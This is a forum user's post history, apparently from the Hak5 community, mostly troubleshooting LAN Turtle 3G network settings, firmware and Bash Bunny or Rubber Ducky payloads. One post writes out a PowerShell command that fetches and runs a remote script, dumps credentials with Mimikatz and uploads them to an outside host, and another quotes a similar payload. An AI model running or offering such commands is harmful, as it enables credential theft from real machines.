Jump to content

mule

Active Members
  • Content Count

    24
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by mule

  1. AutoSSH doesn't work for me once I've unplugged it from my USB port on my local machine. Any way to modify the single quote mark out of the config for AutoSSH?
  2. Audrick Thanks, I appreciate it. I tweaked mine and couldn't get to get an IP address from t-mobile any longer. Sadly, I had not made a backup before I made my tweaks and my memory wasn't spot on as usual. Your /etc/config/network details have restored my 3G LAN Turtle to full working order! This is the one I used. config interface '3gwan' option device '/dev/ttyACM0' option proto '3g' option service 'umts' option metric '10' option disabled '0' option apn 'epc.tmobile.com' option dns '66.94.9.120' M
  3. Audrick, I'm glad my post helped. I was wondering if you would mind sharing your /etc/config/network config (cat /etc/config/network) section for your 3gwan interface? Thanks, M
  4. You can configure AutoSSH from your machine and they deploy it and from the machine that the LAN Turtle is autoSSH'ing to, you'll be able to get in as long as the internet isn't blocked on the target machine.
  5. I think if you disable the WAN Fallback, the 3G connection will its only way to be on the internet. The LAN turtle should work without a 3G SIM card as well. Could you share your /etc/config/network (cat /etc/config/network) settings?
  6. TecDaddy, Which carrier SIM did you use?
  7. Can anyone confirm the /etc/config/network settings below are valid? config interface 'loopback' option ifname 'lo' option proto 'static' option ipaddr '127.0.0.1' option netmask '255.0.0.0' config interface 'lan' option ifname 'eth0' option proto 'static' option ipaddr '172.16.84.1' option gateway '172.16.84.84' option netmask '255.255.255.0' option ip6assign '60' option metric '30' config interface 'wan' option ifname 'eth1' option proto 'dhc
  8. I have a LAN Turtle 3G. I'm using V5 of the firmware. I got the modulemanager to install QuickCreds,AutoSSH,DDNSC, keymanager, meterpreter-sl,netcat,nmap and responder, however, it doesn't allow me to START, ENABLE or CONFIGURE any of the modules that are available. When I try to start Responder I get this blank screen Anybody know what's going on here? I tried to start modules from the bash shell, but that doesn't help. Responder just gives it usage help and nothing else. Its looking more and more like someone at HAK5 needs to do some QC before they rele
  9. Can you ping google or any other site from the shell prompt? ping 8.8.8.8 ping www.google.com I had to start my module manager manually from the shell (bash) prompt (exit the turtle menu) /etc/turtle/modules meterpreter configure /etc/turtle/modules meterpreter start /etc/turtle/modules meterpreter stop /etc/turtle/modules modulemanager start See if that will get you going.
  10. Foxtrot, Thanks for confirming my speculation concerning the WAN Fall Back option. I know I should change my putty settings for HAk5 shells, just too lazy to do it. Thanks for pointing that out for others if they were wondering why my shell window looked different.
  11. Thanks to Just_A_User concerning 8.8.8.8 DNS server vs. t-mobile DNS server 66.94.9.120 & 66.94.25.120 allows my 3gModem to go on-line with either epc or fast.tmobile.com as the APN setting.
  12. Audrick, I think the WAN Fallback is for if the 3G connection isn't available, the LAN turtle will attempt to use the WAN connection. When you SSH to the are you using a 172.16.85.1 address? If so I think that works if the LAN turtle is plugged into a USB port on your local machine. If you aren't connected to the USB, would you mind sharing how you got the IP address of your 3G connection?
  13. I've tried both epc and fast tmobile.com APN's and still no luck. Thanks for searching. My thought in all of this is SHARE what HAK5 did if they used one in development. Its not hard to share something.
  14. Okay. if HAK5 Tested with a T-Mobile SIM, then why haven't they posted the APN information they used????? When I went to T-Mobile's web side for APN settings its says to leave EVERYTHING blank but the APN and DNS address This doesn't WORK at all. COME ON HAK5....lead by example instead of saying we used t-mobile during dev and it works okay. What EXACTLY worked okay? What fields did you populate? The fields that you populated what VALUES did you use? 200 dollar piece of equipment and nothing really but a short video that says how to put the SIM card in. 👿
  15. Thanks. I found it. Factory Reset has been done, but now I can't update to the latest firmware. I keep getting the error below: I downloaded turtle-5.bin from HAK5 and did a sysupgrade -n /tmp/turtle-5.bin manually and that seems to have the 3g modem settings, but doesn't have the features that the firmware I updated to yesterday has.
  16. I have just gotten my LAN Turtle 3G. I hooked it up, did the firmware update and now all it will do is show the green power light (via Ethernet port) and the amber light flashes 3 times and then repeats forever. I opened up my LAN Turtle 3G to do a factory reset, but can't locate a button. Any ideas?
  17. Yes, in the powershell window is when I'm seeing the @ signs.
  18. This is what the rubber ducky is outputting to my CMD window: Notice that @ signs have been subbed for " marks. I've tried changing the language from GB to US, but that doesn't seem to help either powershell @IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)@ Here's the contents of the file that I pass to ducktools (python.exe ducktools.py -e -l us mimi.txt inject1.bin) to get my inject.bin file Any help would be greatly appreciated! Mimi.txt f
  19. mule

    Violation of CoC

    I'm using 1.3 FW on my bash bunny and I'm use .2 of the Mr. Robot (MIMIKATZ) payload. However, when its run on my test machine. I get the following error. I removed the -W hidden from the powershell line, so I could see what was causing the failure. As you can see a bit further down, the 172.16.64.1 address is pingable, so I'm not really sure why I'm getting the unable to connect error or what other arguments are needed for DownloadString. Any help will be greatly appreciated! C:\Windows\System32>powershell "while ($true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Obj
  20. mule

    Creds Payload

    Thanks for the info. Just a couple of follow-up questions. 1. Is this the correct github location for responder -> https://github.com/SpiderLabs/Responder 2. Without responder loaded shouldn't the BB give me an error LED. Once I see the flash of the green LED, nothing else happens. Thanks again for your help!
  21. mule

    Creds Payload

    I've completed the firmware 1.1 update and the impacket tools installation. However, when I place the creds payload into payload.txt under the payload\switch1 directory. I get a quick green flash and nothing else. The only switch position that seems to work is zero. Any advice as to what my next step should be?
  22. mule

    LAN Turtle

    I removed the screws and factory flashed it. Now I'm able to login.
  23. mule

    LAN Turtle

    Those are the username and passwords I used. IPconfig says it sees the LAN Turtle. Ethernet adapter Ethernet 3: Connection-specific DNS Suffix . : lan Description . . . . . . . . . . . : Realtek USB FE Family Controller Physical Address. . . . . . . . . : 00-E0-4C-36-0F-FF DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv6 Address. . . . . . . . . . . : fd8f:cf7a:45fa:0:159d:9f95:dc6d:bb5(Preferred) Temporary IPv6 Address. . . . . . : fd8f:cf7a:45fa:0:9445:a643:a3cc:da53(Preferred) Link-local IPv6 Address . . . . . : fe80::159d:9f95
  24. mule

    LAN Turtle

    I just got my LAN turtle today and plugged it into my USB port. SSH (using putty) to it on 172.16.84.1, got the SSH key trust,typed root for the password and the default password from the Wiki page (http://lanturtle.com/wiki/#!index.md#Connecting_for_the_first_time) but given the error access denied. Any help would be appreciated. Something tells me that the Wiki page password might be out of date. Thanks, Mule
×
×
  • Create New...